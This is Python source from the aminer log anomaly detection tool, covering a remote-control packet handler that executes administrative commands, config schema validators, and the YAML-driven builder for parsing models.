NewMatchPathDetector, \ NewMatchPathValueComboDetector, NewMatchPathValueDetector, ParserCount, Rules, TimeCorrelationDetector, \ TimeCorrelationViolationDetector, TimestampCorrectionFilters, TimestampsUnsortedDetector, VariableTypeDetector, \ AllowlistViolationDetector, EventCountClusterDetector exec_locals = { 'analysis_context': analysis_context, 'remote_control_data': json_request_data[1], 'print_current_config': methods.print_current_config, 'print_config_property': methods.print_config_property, 'print_attribute_of_registered_analysis_component': methods.print_attribute_of_registered_analysis_component, 'change_config_property': methods.change_config_property, 'change_attribute_of_registered_analysis_component': methods.change_attribute_of_registered_analysis_component, 'rename_registered_analysis_component': methods.rename_registered_analysis_component, 'add_handler_to_atom_filter_and_register_analysis_component': methods.add_handler_to_atom_filter_and_register_analysis_component, 'save_current_config': methods.save_current_config, 'allowlist_event_in_component': methods.allowlist_event_in_component, 'blocklist_event_in_component': methods.blocklist_event_in_component, 'print_persistence_event_in_component': methods.print_persistence_event_in_component, 'add_to_persistence_event_in_component': methods.add_to_persistence_event_in_component, 'remove_from_persistence_event_in_component': methods.remove_from_persistence_event_in_component, 'dump_events_from_history': methods.dump_events_from_history, 'ignore_events_from_history': methods.ignore_events_from_history, 'list_events_from_history': methods.list_events_from_history, 'allowlist_events_from_history': methods.allowlist_events_from_history, 'persist_all': methods.persist_all, 'list_backups': methods.list_backups, 'create_backup': methods.create_backup, 'reopen_event_handler_streams': methods.reopen_event_handler_streams, 'EnhancedNewMatchPathValueComboDetector': 
EnhancedNewMatchPathValueComboDetector.EnhancedNewMatchPathValueComboDetector, 'EventCorrelationDetector': EventCorrelationDetector.EventCorrelationDetector, 'EventCountClusterDetector': EventCountClusterDetector.EventCountClusterDetector, 'EventTypeDetector': EventTypeDetector.EventTypeDetector, 'EventFrequencyDetector': EventFrequencyDetector.EventFrequencyDetector, 'EventSequenceDetector': EventSequenceDetector.EventSequenceDetector, 'HistogramAnalysis': HistogramAnalysis.HistogramAnalysis, 'PathDependentHistogramAnalysis': HistogramAnalysis.PathDependentHistogramAnalysis, 'MatchFilter': MatchFilter.MatchFilter, 'MatchValueAverageChangeDetector': MatchValueAverageChangeDetector.MatchValueAverageChangeDetector, 'MatchValueStreamWriter': MatchValueStreamWriter.MatchValueStreamWriter, 'MissingMatchPathValueDetector': MissingMatchPathValueDetector.MissingMatchPathValueDetector, 'NewMatchIdValueComboDetector': NewMatchIdValueComboDetector.NewMatchIdValueComboDetector, 'NewMatchPathDetector': NewMatchPathDetector.NewMatchPathDetector, 'NewMatchPathValueComboDetector': NewMatchPathValueComboDetector.NewMatchPathValueComboDetector, 'NewMatchPathValueDetector': NewMatchPathValueDetector.NewMatchPathValueDetector, 'ParserCount': ParserCount.ParserCount, 'Rules': Rules, 'TimeCorrelationDetector': TimeCorrelationDetector.TimeCorrelationDetector, 'TimeCorrelationViolationDetector': TimeCorrelationViolationDetector.TimeCorrelationViolationDetector, 'SimpleMonotonicTimestampAdjust': TimestampCorrectionFilters.SimpleMonotonicTimestampAdjust, 'TimestampsUnsortedDetector': TimestampsUnsortedDetector.TimestampsUnsortedDetector, 'VariableTypeDetector': VariableTypeDetector.VariableTypeDetector, 'AllowlistViolationDetector': AllowlistViolationDetector.AllowlistViolationDetector } logging.getLogger(REMOTE_CONTROL_LOG_NAME).log(15, json_request_data[0]) logging.getLogger(DEBUG_LOG_NAME).debug('Remote control: %s', json_request_data[0]) global suspended_flag if json_request_data[0] in 
('suspend_aminer()', 'suspend_aminer', 'suspend'): suspended_flag = True msg = methods.REMOTE_CONTROL_RESPONSE + 'OK. aminer is suspended now.' json_remote_control_response = json.dumps(msg) logging.getLogger(DEBUG_LOG_NAME).info(msg) elif json_request_data[0] in ('activate_aminer()', 'activate_aminer', 'activate'): suspended_flag = False msg = methods.REMOTE_CONTROL_RESPONSE + 'OK. aminer is activated now.' json_remote_control_response = json.dumps(msg) logging.getLogger(DEBUG_LOG_NAME).info(msg) else: exec(json_request_data[0], {'__builtins__': None}, exec_locals) # nosec B102 json_remote_control_response = json.dumps(exec_locals.get('remoteControlResponse')) if methods.REMOTE_CONTROL_RESPONSE == '': methods.REMOTE_CONTROL_RESPONSE = None if exec_locals.get('remoteControlResponse') is None: json_remote_control_response = json.dumps(methods.REMOTE_CONTROL_RESPONSE) else: json_remote_control_response = json.dumps( exec_locals.get('remoteControlResponse') + methods.REMOTE_CONTROL_RESPONSE) except Exception: exception_data = traceback.format_exc() logging.getLogger(DEBUG_LOG_NAME).debug('Remote control exception data: %s', str(exception_data)) # This is little dirty but avoids having to pass over remoteControlResponse dumping again. if json_remote_control_response is None: json_remote_control_response = 'null' json_response = f"[{json.dumps(exception_data)}, {json_remote_control_response}]" if len(json_response) + 8 > self.max_control_packet_size: # Damn: the response would be larger than packet size. Fake a secondary exception and return part of the json string # included. Binary search of size could be more efficient, knowing the maximal size increase a string could have in json. 
max_include_size = len(json_response) min_include_size = 0 min_include_response_data = None while True: test_size = (max_include_size + min_include_size) >> 1 if test_size == min_include_size: break emergency_response_data = json.dumps( [f"Exception: Response too large\nPartial response data: {json_response[:test_size], None}..."]) if len(emergency_response_data) + 8 > self.max_control_packet_size: max_include_size = test_size - 1 else: min_include_size = test_size min_include_response_data = emergency_response_data json_response = min_include_response_data # Now size is OK, send the data json_response = json_response.encode() self.output_buffer += struct.pack("!I", len(json_response) + 8) + b'RRRR' + json_response else: msg = f"Invalid request type {repr(request_type)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def may_get(self): """Check if a call to do_get would make sense. @return True if the input buffer already contains a complete wellformed packet or definitely malformed one. """ if len(self.input_buffer) < 4: return False request_length = struct.unpack("!I", self.input_buffer[:4])[0] return (request_length <= len(self.input_buffer)) or (request_length >= self.max_control_packet_size) def do_get(self): """Get the next packet from the input buffer and remove it. @return the packet data including the length preamble or None when request not yet complete. 
""" if len(self.input_buffer) < 4: return None request_length = struct.unpack("!I", self.input_buffer[:4])[0] if (request_length < 0) or (request_length >= self.max_control_packet_size): msg = f"Invalid length value 0x{request_length} in malformed request starting with b64:" \ f"{base64.b64encode(self.input_buffer[:60])}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if request_length > len(self.input_buffer): return None request_data = self.input_buffer[:request_length] self.input_buffer = self.input_buffer[request_length:] return request_data def do_receive(self): """Receive data from the remote side and add it to the input buffer. This method call expects to read at least one byte of data. A zero byte read indicates EOF and will cause normal handler termination. when all input and output buffers are empty. Any other state or error causes handler termination before reporting the error. @return True if read was successful, false if EOF is reached without reading any data and all buffers are empty. @throws Exception when unexpected errors occured while receiving or shuting down the connection. """ data = os.read(self.remote_control_fd, 1 << 16) self.input_buffer += data if not data: self.terminate() def do_send(self): """Send data from the output buffer to the remote side. @return True if output buffer was emptied. """ send_length = os.write(self.remote_control_fd, self.output_buffer) if send_length == len(self.output_buffer): self.output_buffer = b'' return True self.output_buffer = self.output_buffer[send_length:] return False def put_request(self, request_type, request_data): """Add a request of given type to the send queue. @param request_type is a byte string denoting the type of the request. Currently only 'EEEE' is supported. @param request_data is a byte string denoting the content of the request. 
""" if not isinstance(request_type, bytes): msg = 'Request type is not a byte string' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if len(request_type) != 4: msg = 'Request type has to be 4 bytes long' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(request_data, bytes): msg = 'Request data is not a byte string' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if len(request_data) + 8 > self.max_control_packet_size: msg = 'Data too large to fit into single packet' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.output_buffer += struct.pack("!I", len(request_data) + 8) + request_type + request_data def put_execute_request(self, remote_control_code, remote_control_data): """Add a request to send exception data to the send queue.""" remote_control_data = json.dumps([JsonUtil.encode_object(remote_control_code), JsonUtil.encode_object(remote_control_data)]) self.put_request(b'EEEE', remote_control_data.encode()) def add_select_fds(self, input_select_fd_list, output_select_fd_list): """Update the file descriptor lists for selecting on read and write file descriptors.""" if self.output_buffer: output_select_fd_list.append(self.remote_control_fd) else: input_select_fd_list.append(self.remote_control_fd) def terminate(self): """End this remote control session.""" self.control_client_socket.close() # Avoid accidential reuse. 
self.control_client_socket = None self.remote_control_fd = -1 if self.input_buffer or self.output_buffer: msg = 'Unhandled input data' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def is_dead(self): """Check if this remote control connection is already dead.""" return self.remote_control_fd == -1 logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/ConfigValidator.py000066400000000000000000000215311500476301700326320ustar00rootroot00000000000000import sys import os import logging import ast from cerberus import Validator, TypeDefinition class ParserModelType: """Defines a type for parser classes.""" name = None is_model = False func = None def __init__(self, name): self.name = name if name.endswith("ModelElement"): self.is_model = True # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly. module = "aminer.parsing" if name == "DebugMatchContext": module += ".MatchContext" if name == "MultiLocaleDateTimeModelElement": module += ".DateTimeModelElement" else: module += "." 
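class ParserModelType:
    """Defines a type for parser classes.

    Resolves a name from the YAML config to something callable: a parser model element
    class from aminer.parsing (names ending in "ModelElement"), the get_model function of
    an importable module, or a parser built from a YAML file found on sys.path.

    SECURITY: the name comes from the configuration and is passed to __import__(), which
    executes the imported module's top-level code. The config file and every directory on
    sys.path must therefore be trusted; this class does no validation of the name itself.
    """

    name = None
    is_model = False
    func = None

    def __init__(self, name):
        """Resolve name to self.func.

        @param name the parser class, module or YAML parser name from the config.
        @raise ImportError when the name is neither importable nor found as a YAML file.
        @raise ValueError when a YAML parser file fails normalisation.
        """
        self.name = name
        if name.endswith("ModelElement"):
            self.is_model = True
            # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly.
            # (if/elif/else: the original if/if-else chain appended both suffixes for DebugMatchContext.)
            module = "aminer.parsing"
            if name == "DebugMatchContext":
                module += ".MatchContext"
            elif name == "MultiLocaleDateTimeModelElement":
                module += ".DateTimeModelElement"
            else:
                module += "." + name
            self.func = getattr(__import__(module, fromlist=[name]), name)
        else:
            self.is_model = False
            try:
                self.func = __import__(name).get_model
            except (AttributeError, ImportError) as e:
                ymlext = ['.yml', '.YAML', '.YML', '.yaml']
                module = None
                # First match in sys.path order wins; the inner break alone only left the
                # extension loop, so a later directory could silently override an earlier hit.
                for path in sys.path:
                    for extension in ymlext:
                        abs_path = os.path.join(path, name + extension)
                        if os.path.exists(abs_path):
                            module = abs_path
                            break
                    if module is not None:
                        break
                if module is not None:
                    import yaml
                    import copy
                    from aminer.AminerConfig import DEBUG_LOG_NAME
                    from aminer.YamlConfig import filter_config_errors, build_parsing_model
                    # safe_load: YAML tags cannot instantiate arbitrary Python objects.
                    with open(module) as yamlfile:
                        try:
                            yaml_data = yaml.safe_load(yamlfile)
                        except yaml.YAMLError as exception:
                            logging.getLogger(DEBUG_LOG_NAME).error(exception)
                            raise exception
                    # Schema files are dict literals; literal_eval accepts literals only.
                    with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/ParserNormalisationSchema.py', 'r') as sma:
                        parser_normalisation_schema = ast.literal_eval(sma.read())
                    with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/ParserValidationSchema.py', 'r') as sma:
                        parser_validation_schema = ast.literal_eval(sma.read())
                    normalisation_schema = {**parser_normalisation_schema}
                    validation_schema = {**parser_validation_schema}
                    v = ConfigValidator(validation_schema)
                    if not v.validate(yaml_data, validation_schema):
                        # NOTE(review): unlike load_yaml(), the filtered validation errors are computed but
                        # never raised here; only the normalisation pass below rejects the file. Consider
                        # raising ValueError for consistency.
                        filtered_errors = copy.deepcopy(v.errors)
                        filter_config_errors(filtered_errors, 'Parser', v.errors, parser_validation_schema)
                    v = NormalisationValidator(normalisation_schema)
                    if v.validate(yaml_data, normalisation_schema):
                        test = v.normalized(yaml_data)
                        yaml_data = test
                    else:
                        logging.getLogger(DEBUG_LOG_NAME).error(v.errors)
                        raise ValueError(v.errors)
                    self.func, _ = build_parsing_model(yaml_data)
                    if callable(self.func):
                        self.func = self.func()
                else:
                    raise e

    def __str__(self):
        return self.name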
class AnalysisType:
    """Defines a type for analysis classes.

    Resolves a class name from the config to the class object exported by the matching
    module below aminer.analysis. The import happens in __init__, so an unknown name
    surfaces as ImportError at config load time.
    """

    name = None
    func = None

    def __init__(self, name):
        self.name = name
        # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly.
        grouped = {
            ".AtomFilters": ("MatchPathFilter", "MatchValueFilter", "SubhandlerFilter"),
            ".HistogramAnalysis": (
                "LinearNumericBinDefinition", "ModuloTimeBinDefinition", "PathDependentHistogramAnalysis", "BinDefinition",
                "HistogramData"),
            ".MissingMatchPathValueDetector": ("MissingMatchPathListValueDetector",),
            ".Rules": (
                "AndMatchRule", "OrMatchRule", "AtomFilterMatchAction", "DebugHistoryMatchRule", "EventGenerationMatchAction",
                "DebugMatchRule", "IPv4InRFC1918MatchRule", "ModuloTimeMatchRule", "NegationMatchRule", "ParallelMatchRule",
                "PathExistsMatchRule", "StringRegexMatchRule", "ValueDependentDelegatedMatchRule",
                "ValueDependentModuloTimeMatchRule", "ValueListMatchRule", "ValueMatchRule", "ValueRangeMatchRule"),
            ".TimeCorrelationDetector": ("TimeCorrelationDetector", "CorrelationFeature"),
            ".TimeCorrelationViolationDetector": ("TimeCorrelationViolationDetector", "CorrelationRule", "EventClassSelector"),
            ".TimestampCorrectionFilters": ("SimpleMonotonicTimestampAdjust",),
            ".UnparsedAtomHandlers": ("SimpleUnparsedAtomHandler", "VerboseUnparsedAtomHandler"),
        }
        # Default: the module is named like the class.
        suffix = "." + name
        for candidate, members in grouped.items():
            if name in members:
                suffix = candidate
                break
        module = "aminer.analysis" + suffix
        self.func = getattr(__import__(module, fromlist=[name]), name)

    def __str__(self):
        return self.name


class EventHandlerType:
    """Defines a type for event classes.

    Resolves a class name from the config to the class object exported by the matching
    module below aminer.events; the import happens in __init__.
    """

    name = None
    func = None

    def __init__(self, name):
        self.name = name
        # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly.
        grouped = {
            ".EventInterfaces": ("EventHandlerInterface", "EventSourceInterface"),
            ".Utils": ("VolatileLogarithmicBackoffEventHistory",),
        }
        suffix = "." + name
        for candidate, members in grouped.items():
            if name in members:
                suffix = candidate
                break
        module = "aminer.events" + suffix
        self.func = getattr(__import__(module, fromlist=[name]), name)

    def __str__(self):
        return self.name
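# Cerberus type definitions: a field may hold either the resolved wrapper object or the
# still-uncoerced string from the YAML file.
parser_type = TypeDefinition("parsermodel", (ParserModelType, str), ())
analysis_type = TypeDefinition("analysistype", (AnalysisType, str), ())
event_handler_type = TypeDefinition("eventhandlertype", (EventHandlerType, str), ())


class ConfigValidator(Validator):
    """Validates values from the configs.

    Custom rules are discovered by cerberus from the method name (_validate_<rule>) and the
    "The rule's arguments are validated against this schema:" line in the docstring, so
    that text must stay intact.
    """

    def _validate_has_start(self, has_start, field, value):
        """Test that exactly one entry of the list carries "start": true.

        @param has_start rule argument; when true a "start" entry is mandatory.
        @param field the name of the validated field.
        @param value the list of parser dicts.
        The rule's arguments are validated against this schema:
        {'type': 'boolean'}
        """
        seen_start = False
        for var in value:
            if "start" in var and var["start"] is True:
                if seen_start:
                    self._error(field, 'Only one parser with "start"-key is allowed')
                seen_start = True
        if has_start and not seen_start:
            self._error(field, 'Parser must contain a "start"-key')

    def _validate_bigger_than_or_equal(self, bigger_than_or_equal, field, value):
        """
        Check if the value of the current attribute is bigger than or equal to the value of another attribute.
        This check works for integers and floats.
        Usage: {"bigger_than_or_equal": ["lower_value_attribute", default_value_if_not_defined]}
        For example: "max_num_vals": {"type": "integer", "bigger_than_or_equal": ["min_num_vals", 1000]}
        When the referenced attribute is absent from the document the default is compared instead.
        The rule's arguments are validated against this schema:
        {'type': 'list'}
        """
        key, default_value = bigger_than_or_equal
        if key not in self.document:
            lower_value = default_value
        else:
            lower_value = self.document[key]
        if value < lower_value:
            # Report the value actually compared; indexing self.document[key] raised KeyError
            # whenever the default had been used.
            self._error(field, f"{field}(={str(value)}) must be bigger than or equal with {key}(={str(lower_value)}).")


class NormalisationValidator(ConfigValidator):
    """Normalises values from the configs.

    Adds the parsermodel/analysistype/eventhandlertype types and the coerce hooks that
    turn config strings into the corresponding wrapper objects (which import the named
    classes or modules as a side effect).
    """

    types_mapping = Validator.types_mapping.copy()
    types_mapping["parsermodel"] = parser_type
    types_mapping["analysistype"] = analysis_type
    types_mapping["eventhandlertype"] = event_handler_type

    def _normalize_coerce_toparsermodel(self, value):
        """Create a ParserModelType from the string representation; non-strings become None."""
        if isinstance(value, str):
            return ParserModelType(value)
        return None

    def _normalize_coerce_toanalysistype(self, value):
        """Create a AnalysisType from the string representation; non-strings become None."""
        if isinstance(value, str):
            return AnalysisType(value)
        return None

    def _normalize_coerce_toeventhandlertype(self, value):
        """Create a EventHandlerType from the string representation; non-strings become None."""
        if isinstance(value, str):
            return EventHandlerType(value)
        return None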
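"""This file loads and parses a config-file in yaml format.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see
<https://www.gnu.org/licenses/>.
"""

import sys
import logging
import copy
import ast
import pytz
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.util.StringUtil import decode_string_as_byte_string

# Module state filled by load_yaml(): the normalised config and its top-level keys.
config_properties = {}
yaml_data = None
enhanced_new_match_path_value_combo_detector_reference = None


def load_yaml(config_file):
    """Load the yaml configuration from files.

    Basically there are two schema types: validation schemas and normalisation schemas. The validation schemas validate together
    with the BaseSchema all inputs as specifically as possible. Due to the limitations of oneof_schemas and the not functional
    normalisation in the validation schemas, the normalisation schemas are used to set default values and convert the date in
    right data types with coerce procedures.

    The file is read with yaml.safe_load(), so YAML tags cannot instantiate arbitrary Python objects; the schema files are
    parsed with ast.literal_eval(), which accepts literals only. Note that normalisation coerces type names into
    ParserModelType/AnalysisType/EventHandlerType objects, which import the named classes or modules, so the config must
    still be trusted. On success the normalised document is stored in the module globals yaml_data and config_properties.

    @param config_file path of the YAML configuration.
    @raise yaml.YAMLError when the file is not valid YAML (logged, then re-raised).
    @raise ValueError when validation or normalisation against the schemas fails.
    """
    # We might be able to remove this and us it like the config_properties
    global yaml_data
    import yaml
    from aminer.ConfigValidator import ConfigValidator, NormalisationValidator
    import os

    # The with-statement closes the file; an explicit close() inside it was redundant.
    with open(config_file) as yamlfile:
        try:
            yaml_data = yaml.safe_load(yamlfile)
        except yaml.YAMLError as exception:
            logging.getLogger(DEBUG_LOG_NAME).error(exception)
            raise exception

    def _read_schema(relative_path):
        """Read one schema file (a Python dict literal) relative to this module's directory."""
        with open(os.path.dirname(os.path.abspath(__file__)) + '/' + relative_path, 'r') as sma:
            return ast.literal_eval(sma.read())

    base_schema = _read_schema('schemas/BaseSchema.py')
    parser_normalisation_schema = _read_schema('schemas/normalisation/ParserNormalisationSchema.py')
    analysis_normalisation_schema = _read_schema('schemas/normalisation/AnalysisNormalisationSchema.py')
    event_handler_normalisation_schema = _read_schema('schemas/normalisation/EventHandlerNormalisationSchema.py')
    parser_validation_schema = _read_schema('schemas/validation/ParserValidationSchema.py')
    analysis_validation_schema = _read_schema('schemas/validation/AnalysisValidationSchema.py')
    event_handler_validation_schema = _read_schema('schemas/validation/EventHandlerValidationSchema.py')

    normalisation_schema = {
        **base_schema, **parser_normalisation_schema, **analysis_normalisation_schema, **event_handler_normalisation_schema}
    validation_schema = {**base_schema, **parser_validation_schema, **analysis_validation_schema, **event_handler_validation_schema}
    v = ConfigValidator(validation_schema)
    if not v.validate(yaml_data, validation_schema):
        filtered_errors = copy.deepcopy(v.errors)
        filter_config_errors(filtered_errors, 'Analysis', v.errors, analysis_validation_schema)
        filter_config_errors(filtered_errors, 'Parser', v.errors, parser_validation_schema)
        filter_config_errors(filtered_errors, 'EventHandlers', v.errors, event_handler_validation_schema)
        raise ValueError(f'Config-Error: {filtered_errors}')
    v = NormalisationValidator(normalisation_schema)
    if v.validate(yaml_data, normalisation_schema):
        yaml_data = v.normalized(yaml_data)
    else:
        logging.getLogger(DEBUG_LOG_NAME).error(v.errors)
        raise ValueError(v.errors)
    # Set default values
    for key, val in yaml_data.items():
        config_properties[str(key)] = val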
def filter_config_errors(filtered_errors, key_name, errors, schema):
    """Filter oneof outputs to produce a clear overview of the error.

    Rewrites the cerberus "none or more than one rule validate" causes for key_name in
    place: definitions that failed only with an "unallowed value ..." type error are
    dropped (the last such message is kept as "<key_name> error" if nothing else is
    left), the others get the allowed/forbidden type list of the matching oneof entry.
    Mutates the nested dicts shared between errors and filtered_errors.
    """
    oneof = schema[key_name]['schema']['oneof']
    if key_name not in errors:
        return
    unallowed_prefix = 'unallowed value '
    for position, err in enumerate(errors[key_name]):
        if isinstance(err, str):
            err = {0: err}
        for key in err:
            if 'none or more than one rule validate' not in err[key]:
                continue
            for cause in err[key]:
                if not isinstance(cause, dict):
                    continue
                # we need to copy the dictionary as it is not possible to iterate through it and change the size.
                last_error = None
                for definition in copy.deepcopy(cause):
                    first_detail = cause[definition][0]
                    if 'type' in first_detail and first_detail['type'][0].startswith(unallowed_prefix):
                        last_error = first_detail['type'][0]
                        del cause[definition]
                        continue
                    oneof_def_pos = int(definition.split(' ')[-1])
                    oneof_schema_type = oneof[oneof_def_pos]['schema']['type']
                    if 'forbidden' in oneof_schema_type:
                        first_detail['type'] = {'forbidden': oneof_schema_type['forbidden']}
                    elif 'allowed' in oneof_schema_type:
                        first_detail['type'] = {'allowed': oneof_schema_type['allowed']}
                if len(cause) == 0 and last_error is not None:
                    cause[key_name + ' error'] = last_error
        filtered_errors[key_name][position] = err


# Add your ruleset here:
def build_analysis_pipeline(analysis_context):
    """Define the function to create pipeline for parsing the log data.

    It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them.
    Builds the parser, the input pipeline, the event handlers and the analysis components in that order, then wires each
    analysis component's output_event_handlers (given as ids) to the matching handler objects.
    """
    parsing_model, parser_model_dict = build_parsing_model()
    anomaly_event_handlers, atom_filter = build_input_pipeline(analysis_context, parsing_model, parser_model_dict)
    event_handler_id_list = build_event_handlers(analysis_context, anomaly_event_handlers)
    build_analysis_components(analysis_context, anomaly_event_handlers, atom_filter, parsing_model)
    # do not check UnparsedAtomHandler
    for offset, entry in enumerate(atom_filter.subhandler_list[1:], start=1):
        component = entry[0]
        if component.output_event_handlers is None:
            continue
        resolved = [anomaly_event_handlers[event_handler_id_list.index(handler_id)] for handler_id in component.output_event_handlers]
        atom_filter.subhandler_list[offset][0].output_event_handlers = resolved
times in Parser!') if 'start' in item and item['start'] is True and item['type'].name not in ['JsonModelElement', 'JsonStringModelElement', 'XmlModelElement']: start = item if item['type'].is_model: if 'args' in item: if isinstance(item['args'], list): for i, value in enumerate(item["args"]): if (isinstance(value, str) and value == "WHITESPACE") or (isinstance(value, bytes) and value == b"WHITESPACE"): from aminer.parsing.FixedDataModelElement import FixedDataModelElement sp = f'sp{int(ws_count)}' item["args"][i] = FixedDataModelElement(sp, b' ') ws_count += 1 if item['type'].name not in ('DecimalFloatValueModelElement', 'DecimalIntegerValueModelElement'): # encode string to bytearray for j, val in enumerate(item['args']): if isinstance(val, str): item['args'][j] = val.encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r"). \ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") else: if item['type'].name not in ('DecimalFloatValueModelElement', 'DecimalIntegerValueModelElement') and \ isinstance(item['args'], str): item['args'] = item['args'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") if item['type'].name == 'ElementValueBranchModelElement': value_model = parser_model_dict.get(item['args'][0].decode()) if value_model is None: msg = f'The parser model {item["args"][0].decode()} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) branch_model_dict = {} for i in item['branch_model_dict']: key = i['id'] model = i['model'] if parser_model_dict.get(model) is None: msg = f'The parser model {key} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) branch_model_dict[key] = parser_model_dict.get(model) parser_model_dict[item['id']] = item['type'].func(item['name'], value_model, item['args'][1].decode(), branch_model_dict) elif item['type'].name == 'DateTimeModelElement': time_zone = item['time_zone'] if time_zone is not None: time_zone = pytz.timezone(time_zone) parser_model_dict[item['id']] = item['type'].func( item['name'], item['date_format'].encode(), time_zone, item['text_locale'], item['start_year'], item['max_time_jump_seconds']) elif item['type'].name == 'MultiLocaleDateTimeModelElement': date_formats = [] for date_format in item['date_formats']: if len(date_format['format']) != 3: msg = 'The date_format must have a size of 3!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) fmt = date_format['format'] fmt[0] = fmt[0].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").replace(b"\\\\", b"\\").\ replace(b"\\b", b"\b") date_formats.append(tuple(fmt)) parser_model_dict[item['id']] = item['type'].func( item['name'], date_formats, item['start_year'], item['max_time_jump_seconds']) elif item['type'].name == 'RepeatedElementDataModelElement': model = item['args'][0].decode() if parser_model_dict.get(model) is None: msg = f'The parser model {model} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) item['args'][0] = parser_model_dict.get(model) parser_model_dict[item['id']] = item['type'].func(item['name'], item['args'][0]) if len(item['args']) == 2: parser_model_dict[item['id']] = item['type'].func(item['name'], item['args'][0], item['args'][1]) elif len(item['args']) == 3: parser_model_dict[item['id']] = item['type'].func(item['name'], item['args'][0], item['args'][1], item['args'][2]) elif len(item['args']) > 3: msg = 'The RepeatedElementDataModelElement does not have more than 3 arguments.' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) elif item['type'].name == 'DecimalFloatValueModelElement': parser_model_dict[item['id']] = item['type'].func( item['name'], item['value_sign_type'], item['value_pad_type'], item['exponent_type']) elif item['type'].name == 'DecimalIntegerValueModelElement': parser_model_dict[item['id']] = item['type'].func(item['name'], item['value_sign_type'], item['value_pad_type']) elif item['type'].name in ('FirstMatchModelElement', 'SequenceModelElement'): children = [] if not isinstance(item['args'], list): msg = f'"args" has to be a list when using the {item["type"].name}. Currently args is defined as {repr(item["args"])}' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for child in item['args']: if isinstance(child, bytes): child = child.decode() if isinstance(child, str): if parser_model_dict.get(child) is None: msg = f'The parser model {child} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) children.append(parser_model_dict.get(child)) else: children.append(child) parser_model_dict[item['id']] = item['type'].func(item['name'], children) elif item['type'].name == 'OptionalMatchModelElement': optional_element = parser_model_dict.get(item['args'].decode()) if optional_element is None: msg = f'The parser model {item["args"].decode()} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) parser_model_dict[item['id']] = item['type'].func(item['name'], optional_element) elif item['type'].name == 'DelimitedDataModelElement': delimiter = item['delimiter'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") parser_model_dict[item['id']] = item['type'].func(item['name'], delimiter, item['escape'], item['consume_delimiter']) elif item['type'].name == 'JsonModelElement': key_parser_dict = parse_json_yaml(item['key_parser_dict'], parser_model_dict) if 'start' in item and item['start'] is True: start = item['type'].func( item['name'], key_parser_dict, item['optional_key_prefix'], item['nullable_key_prefix'], item['allow_all_fields']) else: parser_model_dict[item['id']] = item['type'].func( item['name'], key_parser_dict, item['optional_key_prefix'], item['nullable_key_prefix'], item['allow_all_fields']) elif item['type'].name == 'XmlModelElement': key_parser_dict = parse_json_yaml(item['key_parser_dict'], parser_model_dict) if 'start' in item and item['start'] is True: start = item['type'].func( item['name'], key_parser_dict, item['attribute_prefix'], item['optional_attribute_prefix'], item['empty_allowed_prefix'], item['xml_header_expected']) else: parser_model_dict[item['id']] = item['type'].func( item['name'], key_parser_dict, item['attribute_prefix'], item['optional_attribute_prefix'], item['empty_allowed_prefix'], item['xml_header_expected']) elif item['type'].name == 'JsonStringModelElement': key_parser_dict = parse_json_yaml(item['key_parser_dict'], parser_model_dict) if 'start' in item and item['start'] is True: start = item['type'].func(item['name'], key_parser_dict, item['strict'], item['ignore_null']) else: parser_model_dict[item['id']] = item['type'].func(item['name'], key_parser_dict, item['strict'], item['ignore_null']) else: if 'args' in item: parser_model_dict[item['id']] = 
item['type'].func(item['name'], item['args'])
                    else:
                        parser_model_dict[item['id']] = item['type'].func(item['name'])
        else:
            if callable(item['type']):
                parser_model_dict[item['id']] = item['type'].func()
            else:
                parser_model_dict[item['id']] = item['type'].func
        # Keep calling the stored value until it is no longer callable, so the dict ends up holding an instance.
        while callable(parser_model_dict[item['id']]):
            parser_model_dict[item['id']] = parser_model_dict[item['id']]()
    if start.__class__.__name__ in ['JsonModelElement', 'JsonStringModelElement', 'XmlModelElement']:
        parsing_model = start
    else:
        parsing_model = parser_model_dict[start['id']]
    return parsing_model, parser_model_dict


def build_input_pipeline(analysis_context, parsing_model, parser_model_dict):
    """Build the input pipeline.

    Reads the ``Input`` and ``LogResourceList`` sections of the ``yaml_data`` configuration (module scope), registers a
